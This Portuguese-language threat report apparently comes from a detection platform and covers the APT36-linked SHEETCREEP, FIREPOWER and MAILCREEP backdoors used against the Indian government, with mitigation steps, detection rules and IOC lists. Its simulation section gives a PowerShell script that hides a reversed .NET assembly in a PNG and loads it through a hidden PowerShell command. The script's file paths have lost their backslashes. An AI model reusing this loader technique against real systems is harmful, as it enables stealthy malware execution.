Ataques APT Miram o Governo da Índia com SHEETCREEP, FIREPOWER e MAILCREEP | Parte 2
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
O relatório cobre a operação Sheet Attack, que implantou três backdoors sob medida—SHEETCREEP, FIREPOWER, e MAILCREEP—para comprometer organizações governamentais indianas. Os implantes confiaram em plataformas de nuvem legítimas para comando-e-controle, incluindo Google Sheets, Firebase Realtime Database, e Microsoft Graph API, ajudando a atividade a se misturar ao tráfego normal de SaaS. A análise também observa artefatos consistentes com desenvolvedores utilizando IA gerativa para auxiliar na produção de código. A campanha é avaliada como provavelmente ligada a um subgrupo baseado no Paquistão do APT36.
Investigação
A ThreatLabz conduziu análises dinâmicas e estáticas dos backdoors, documentando métodos de persistência, fluxos de trabalho C2 e comportamento de exfiltração de dados. A equipe também mapeou a infraestrutura de suporte, observou filtragem baseada em geografia e User-Agent, e capturou indicadores a nível de código que sugerem geração de código assistida por IA.
Mitigação
Implemente detecções em camadas para cadeias de entrega suspeitas de PDF/LNK e monitore tarefas agendadas que iniciam execuções de PowerShell ou VBS. Aplique controles rigorosos de saída e monitoramento de anomalias para serviços de nuvem comumente abusados como C2, incluindo Google Sheets, Firebase e Microsoft Graph. Use bloqueio baseado em hash para payloads conhecidos e bloqueie domínios e endereços IP maliciosos identificados.
Resposta
Quando detectado, isole o ponto de extremidade, termine a atividade oculta de cmd.exe e PowerShell, remova as tarefas agendadas relacionadas e exclua os binários do backdoor. Preserve e revise logs de C2 baseados no Google Sheets e artefatos do Firebase, e então busque outros hosts no ambiente exibindo os mesmos indicadores.
Attack Flow
Detections
Download or Upload via Powershell (via cmdline)
View
Microsoft Graph API Domain Resolved By Unusual Process (via dns_query)
View
Suspicious Files in Public User Profile (via file_event)
View
Suspicious GNU Wget Execution Attempt (via cmdline)
View
Call Suspicious .NET Methods from Powershell (via powershell)
View
Suspicious Execution from Public User Profile (via process_creation)
View
Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via dns)
View
Suspicious Extracted Files from an Archive (via file_event)
View
IOCs (SourceIP) to detect: APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2
View
IOCs (HashMd5) to detect: APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2
View
IOCs (DestinationIP) to detect: APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2
View
IOCs (HashSha1) to detect: APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2
View
IOCs (HashSha256) to detect: APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2
View
Detection of PowerShell Commands for SHEETCREEP and FIREPOWER Backdoor Deployment [Windows Powershell]
View
Detection of SHEETCREEP and FIREPOWER Backdoor C2 Communication [Windows Network Connection]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands:
- Stage the malicious PNG:
- The attacker creates a PNG file (
details.png) that actually contains a compiled .NET assembly byte stream, but with its bytes reversed to evade static analysis.
- The attacker creates a PNG file (
- Launch PowerShell in hidden mode to load the assembly:
- The attacker runs PowerShell with
-WindowStyle Hidden -Commandand a one‑liner that reads the reversed bytes, restores the correct order, loads the assembly via[System.Reflection.Assembly]::Load(), and invokes a known entry point (Task10.Program::MB()).
- The attacker runs PowerShell with
- Alternative LNK‑based fire‑power deployment:
- A crafted
.lnkshortcut executespowershell.exewith--headless -e(encoded script) to fetch and run a remote PowerShell backdoor.
- A crafted
These steps exactly match the strings the Sigma rule is looking for, ensuring the alert fires.
- Stage the malicious PNG:
-
Regression Test Script:
# ------------------------------------------------- # SHEETCREEP payload simulation – reproduces the exact command line # ------------------------------------------------- # 1. Create a dummy .NET assembly (simple C# hello world) and compile it $source = @" using System; public class Task10 { public static void MB() { Console.WriteLine("Payload executed"); } } "@ $tempDir = "$env:TEMPsheetcreep" New-Item -ItemType Directory -Force -Path $tempDir | Out-Null $csFile = Join-Path $tempDir "Task10.cs" $dllFile = Join-Path $tempDir "Task10.dll" $source | Set-Content -Path $csFile -Encoding UTF8 # Compile using csc (assumes .NET Framework SDK installed) $cscPath = "$env:WINDIRMicrosoft.NETFramework64v4.0.30319csc.exe" & $cscPath /target:library /out:$dllFile $csFile # 2. Read the DLL bytes, reverse them, and write to a .png file $bytes = [IO.File]::ReadAllBytes($dllFile) $revBytes = $bytes[($bytes.Length-1)..0] $pngPath = Join-Path $tempDir "details.png" [IO.File]::WriteAllBytes($pngPath, $revBytes) # 3. Execute the exact malicious PowerShell command line (this will fire the rule) $maliciousCmd = '-WindowStyle Hidden -Command "$b=[IO.File]::ReadAllBytes(''details.png'');' + '([System.Reflection.Assembly]::Load([byte[]]($b[($b.Length-1)..0])).GetType("Task10.Program")::MB())"' Start-Process -FilePath "$env:SystemRootSystem32WindowsPowerShellv1.0powershell.exe" ` -ArgumentList $maliciousCmd ` -WindowStyle Hidden ` -NoNewWindow # Cleanup (optional, run after verification) # Remove-Item -Recurse -Force $tempDir -
Cleanup Commands:
# Remove temporary files and directories created for the test $tempDir = "$env:TEMPsheetcreep" if (Test-Path $tempDir) { Remove-Item -Recurse -Force $tempDir }